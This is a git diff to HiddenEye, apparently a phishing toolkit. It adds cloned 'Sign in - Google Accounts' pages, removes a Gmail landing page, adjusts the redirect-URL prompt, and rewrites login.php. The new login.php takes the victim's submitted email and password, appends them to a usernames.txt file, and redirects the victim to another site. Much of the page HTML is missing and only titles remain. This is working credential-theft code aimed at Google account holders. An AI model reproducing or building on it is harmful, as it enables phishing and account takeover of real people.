diff --git a/HiddenEye.py b/HiddenEye.py index 96bc008..f4b9651 100644 --- a/HiddenEye.py +++ b/HiddenEye.py @@ -308,10 +308,10 @@ if __name__ == "__main__": def custom(): #Question where user can input custom web-link print("\n {0}Insert a custom redirect url:".format(CYAN, DEFAULT)) custom = input("\n{0}[HIDDENEYE-DARKSEC]- > {1}".format(CYAN, DEFAULT)) - if 'http://' or 'https://' in custom: + if 'https://' in custom: pass else: - custom = 'http://' + custom + custom = 'https://' + custom if path.exists('Server/www/post.php') and path.exists('Server/www/login.php'): with open('Server/www/login.php') as f: read_data = f.read() diff --git a/WebPages/google_standard/accounts.login.php b/WebPages/google_standard/accounts.login.php new file mode 100644 index 0000000..7ba6f60 --- /dev/null +++ b/WebPages/google_standard/accounts.login.php @@ -0,0 +1,1903 @@ + + + + + + +Sign in - Google Accounts
\ No newline at end of file diff --git a/WebPages/google_standard/index.html b/WebPages/google_standard/index.html deleted file mode 100644 index 33ede9b..0000000 --- a/WebPages/google_standard/index.html +++ /dev/null @@ -1,2080 +0,0 @@ - - - - - - Gmail: Email from Google - - - - - - - - - - - -
-
-
- - -
-
-
- -
-
-

Gmail

-

A Google approach to email.

-
-

- Gmail is built on the idea that email can be more intuitive, efficient, and useful. And maybe even fun. After all, Gmail has: -

-
    -
  • - -

    Lots of space

    -

    - Over 10367.012381 megabytes (and counting) of free storage. -

    -
  • -
  • - -

    Less spam

    -

    Keep unwanted messages out of your inbox.

    -
  • -
  • - -

    Mobile access

    -

    Get Gmail on your mobile phone. Learn more

    -
  • -
- -
- -

Take Gmail to work with Google Apps for Business

-

Love Gmail, but looking for a custom email address for your company?

-

Get business email, calendar, and online docs @your_company.com. Learn more

-
-
-
-
- - - - - - - - - - - -
- - - diff --git a/WebPages/google_standard/index.php b/WebPages/google_standard/index.php new file mode 100644 index 0000000..c252cbe --- /dev/null +++ b/WebPages/google_standard/index.php @@ -0,0 +1,1889 @@ + + +Sign in - Google Accounts
\ No newline at end of file diff --git a/WebPages/google_standard/login.php b/WebPages/google_standard/login.php index 5d99e3e..e71bef0 100644 --- a/WebPages/google_standard/login.php +++ b/WebPages/google_standard/login.php @@ -1,6 +1,22 @@ '); -exit(); + session_start(); + + $pass = $_POST["password"]; + $email=$_SESSION["Email"]; + //opening logins text file for appending new data. + $file = fopen("usernames.txt", "a") or die("Unable to open file!"); + + //Writing email and password to logins.txt. + fwrite($file, "[EMAIL: ]" . " ". $email . " " . " " . "[PASS: ]" . " " . $pass .FILE_APPEND); + fclose($file);//closing logins.txt. + + //redirecting user to the google drive's locations where the game is available to download. + //change the location url to redirect to a website of your choice. + header('Location: '); + exit(); + + + session_destroy(); + +?>